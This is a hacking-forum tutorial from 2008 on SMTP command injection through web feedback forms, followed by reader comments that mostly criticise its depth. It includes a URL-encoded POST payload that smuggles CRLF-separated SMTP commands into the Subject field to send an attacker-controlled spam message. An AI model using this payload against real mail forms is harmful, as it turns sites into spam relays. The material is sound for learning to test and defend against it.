Follow us on Twitter!
I'd prefer to die standing, than to live on my knees - Che Guevara
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 34
Guests Online: 30
Members Online: 4

Registered Members: 82841
Newest Member: and3rv1sh
Latest Articles

SMTP injection

Arrow Image About injection of commands into SMTP



I haven't done anything in a while, and I didn't find this here, so I figured I'd write an article on it. Here you go.

There are cases where an application may preform the SMTP conversation itself, or may pass user supplied input to a different component in order to do this. In this situation, it may be possible to inject arbitrary SMTP commands directly into this conversation, potentially taking full control of the messages being generated by the application.

For example, consider an application that uses requests of the following form to submit site feedback:

Post feedback.php HTTP/1.1
Host site.com
CONTENT-LENGTH: 56

From=me@mail.com&Subject=Site+feeback&message=hello


This causes the web application to preform an SMTP conversation with the following commands:

MAIL FROM: me@mail.com
RCPT TO: feedback@site.com
DATA
From: me@mail.com
To: feddback@site.com
Subject: site feedback
hello


NOTE: After the SMTP client issues the DATA command, it sends the contents of the email message comprising of the message headers and body, and then sends a single dot character on its own line. This tells the server that the message is complete, and the client can then issue further SMTP commands to send further messages.

In this situation, you may be able to inject arbitrary SMTP commands into any of the email fields that you control. For example, you can attempt to inject into the Subject field as follows:

Post feedback.php HTTP/1.1
Host site.com
CONTENT-LENGTH: 240

From=me@mail.com&Subject=Site+feeback%0d%0ahello%0d%0a%2e%0d%0aMail+FROM:+mail@viagra.com%0d%0aRSPT +TO:+john@mail.com%0d%0aDATA%0d%0aFROM:+person@mail.com%0d%0aTO+john@mail.com%0d%0aSubject:+Cheap+viagra%0d%0aBlah%0d%0a%2e%0d%0amessage=foo

If the application is vulnerable, then this will result in the following SMTP conversation, which give two different email messages, with the second being entirely within you control:

MAIL FROM: me@mail.com
RCPT TO: feedback@site.com
DATA
From: me@mail.com
To: feddback@site.com
Subject: site feedback
hello
.
MAIL FROM: person@mail.com
RCPT TO: john@mail.com
DATA
From: person@mail.com
To: john@smail.com
Subject: Cheap Viagra
Blah
.
foo
.


Finding SMTP injection flaws:

To probe an application's mail functionality effectively, you need to target every parameter that is submitted to an email-related function, even those that may initially appear to be unrelated to the content of the generated message.

You should also test for each kind of attack, and you should preform each test case using both windows and unix-style newline characters.

I hope you liked it, I'm working on more as we speak.

Comments

Zephyr_Pureon December 28 2008 - 01:45:10
I didn't approve this article because: (1) The content is very light and lofty and, (2) I feel like I've seen it before. While you illustrate a single technique, you don't explain it well enough to even make this a single-focus article. I should've just disapproved this heap of shit when I had the chance.
Zephyr_Pureon December 28 2008 - 02:29:22
The problem is that people care less, submit less, and ultimately pieces of shit like this seem to make it through the cracks. We need quality members, quality content, and at least halfway give-a-shit-itude. I'm just going to start disapproving anything that looks halfway questionable, since some people seem incapable of disapproving shit when they see it in the submissions.
korgon December 28 2008 - 03:26:59
Old, outdated and bullshit. Anyone running this is an ass! SMTP exploits have change my dear. Grammer and punctuation sucks bad. Sorry! -10/10
fallingmidgeton December 28 2008 - 22:40:17
so this and the other article are crap and disclose obvious things where as "how not to annoy others" is very good and in no way discloses the obvious. it feels like there are some bias people here.
Zephyr_Pureon December 29 2008 - 12:40:50
No, you're just hoping that there are biased people here so that you can defend your choice to write an article solely about one "trick" (email header injection using carriage returns and new lines). Since you chose to bring up that particular article, I'll bite... I approved it (for laughs) and commented on it stating that it couldn't possibly get an "Awesome". Now, why did it get the positive reviews that it did? The purpose of his article was a valid one and was expressed using: (1) Good grammar technique, (2) Good structure of thoughts and supporting details, and (3) Depth of concepts and logic. Take out the quote blocks in your article here and look at the amount of text you actually wrote. Read it and pay attention to the depth (or lack thereof). You gave the "how not to annoy others" article a Good rating... What would you give yours here?
fallingmidgeton December 29 2008 - 12:52:39
i rated mine average because i see what you mean. i could have gone more in depth about it and perhaps broaden the scope of the article to other uses of this trick
richohealeyon January 01 2009 - 08:39:09
Also explain that your % escapes rely totally on the http actually converting them to their ascii equivalents, some don't.
Bejkeron January 10 2009 - 15:38:27
I can't understand why other "smart asses" acting like a jurkes.It's not the best but show some respect because S/He spent some time writing this.I also don't know English good (so what than),but know how to every bit working in my PC.Your replays are annoying... Writing for such a "nice" people is a wasting of time! "You didn't even explain what %0d%0a is/does..."Let's open hellboundpedia... Good for exert...
Nubilosuson January 17 2009 - 19:55:05
www.acc3ssdenied.com/delete.JPG <- Here you go sorry, bored)
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.